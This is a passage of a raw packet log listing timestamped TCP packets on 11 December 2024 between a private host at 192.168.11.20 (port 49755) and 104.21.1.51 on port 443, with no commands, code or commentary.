Dec 11, 2024 12:29:32.648538113 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.648572922 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.648709059 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.648709059 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.648761034 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.648770094 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.648775101 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.648824930 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.648900986 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.650160074 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.650167942 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.650368929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.650527000 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.650536060 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.650620937 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.650775909 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.651422977 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.651489019 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.651595116 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.651645899 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.651645899 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.651657104 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.651663065 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.652961969 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.652973890 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.653172970 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.653182030 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.653260946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.653260946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.653314114 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.653387070 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.653435946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.654844999 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.654876947 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.655036926 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.655036926 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.655046940 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.655095100 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.655181885 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.656883001 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.656891108 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.657080889 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.657089949 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.657198906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.658746958 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.658771038 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.658947945 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.658947945 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.658958912 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.659054041 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.659820080 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.659827948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.660026073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.660026073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.660036087 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.660094023 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.660094023 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.661612988 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.661619902 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.661813021 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.661813021 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.661823034 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.661906004 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.661992073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.663659096 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.663666964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.663872957 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.663958073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.663958073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.663981915 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.665381908 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.665391922 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.665649891 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.665649891 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.665661097 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.665756941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.665859938 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.667227030 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.667236090 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.667416096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.667416096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.667464018 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.667469978 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.667534113 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.668536901 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.668546915 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.668741941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.668741941 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.668752909 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.668838978 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.668857098 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.670317888 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.670326948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.670499086 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.670510054 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.670623064 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.672231913 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.672243118 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.672522068 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.672533035 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.672605991 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.672653913 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.672728062 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.673974991 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.673985004 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.674141884 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.674141884 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.674155951 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.674259901 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.674259901 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.675857067 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.675867081 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.676052094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.676052094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.676060915 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.676100969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.676100969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.676121950 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.677309990 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.677335024 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.677514076 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.677514076 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.677524090 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.677586079 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.677696943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.679024935 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.679033041 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.679284096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.679292917 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.679301977 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.680943966 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.680953979 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.681154013 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.681163073 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.681204081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.681247950 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.681247950 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.682749033 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.682761908 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.682950974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.682950974 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.682960987 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.682972908 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.683101892 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.684525013 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.684551954 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.684731960 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.684731960 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.684741020 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.684864044 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.685563087 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.685570002 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.685796976 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.685796976 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.685806990 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.685815096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.685915947 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.687638044 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.687648058 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.687835932 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.687835932 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.687844992 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.687886953 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.687978029 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.689465046 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.689472914 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.689661026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.689661026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.689671040 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.689729929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.689739943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.689739943 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.691303015 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.691313028 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.691514969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.691515923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.691524982 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.691617012 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.691617012 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.692415953 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.692423105 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.692616940 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.692616940 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.692626953 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.692765951 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.694240093 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.694251060 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.694437027 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.694437027 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.694446087 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.694515944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.694515944 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.696460962 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.696469069 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.696654081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.696654081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.696662903 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.696722031 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.696822882 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.698136091 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.698143959 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.698338985 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.698338985 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.698348999 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.698410034 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.699457884 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.699466944 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.699625015 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.699625015 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.699632883 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.699673891 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.699673891 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.699773073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.700987101 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.701061010 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.701256037 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.701265097 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.701463938 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.702821970 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.702830076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.703011036 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.703109026 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.703114033 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.703304052 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.704180956 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.704241991 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.704371929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.704371929 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.704423904 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.704432964 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.704482079 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.704726934 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.865562916 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.865576029 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.865761042 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.865761042 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.865775108 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.865782976 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.865861893 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.865979910 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.867126942 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.867141008 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.867321968 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.867321968 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.867378950 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.867391109 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.867403984 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.867562056 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.868765116 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.868777990 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.868962049 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.868962049 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.868977070 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.868983984 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.869102955 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.869216919 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.869786978 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.869800091 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.869982958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.869982958 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.870038986 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.870050907 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.870059013 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.870277882 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.871509075 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.871526003 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.871701002 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.871803999 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.871812105 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.872003078 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873291969 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.873303890 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.873488903 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873488903 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873503923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873503923 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873511076 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.873579979 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.873704910 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.874691963 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.874703884 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.874965906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.874965906 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.874985933 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.874994040 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.875060081 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.875185966 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.875658035 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.875669003 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.875847101 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.875957966 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.875969887 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.876153946 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.877489090 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.877501965 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.877669096 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.877718925 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.877727032 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.877820969 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.877924919 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879268885 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.879281998 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.879456043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879456043 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879508972 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879514933 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.879556894 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879607916 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.879760027 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.880528927 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.880538940 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.880681038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.880681038 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.880755901 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.880762100 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.880804062 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.880954981 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882060051 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882147074 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.882159948 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.882332087 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882332087 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882340908 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.882383108 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882430077 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.882533073 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883507013 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.883518934 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.883688927 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883688927 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883742094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883742094 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883747101 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.883836985 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.883903980 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.885363102 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.885375023 CET	443	49755	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:32.885516882 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.885516882 CET	49755	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:32.885585070 CET	49755	443	192.168.11.20	104.21.1.51
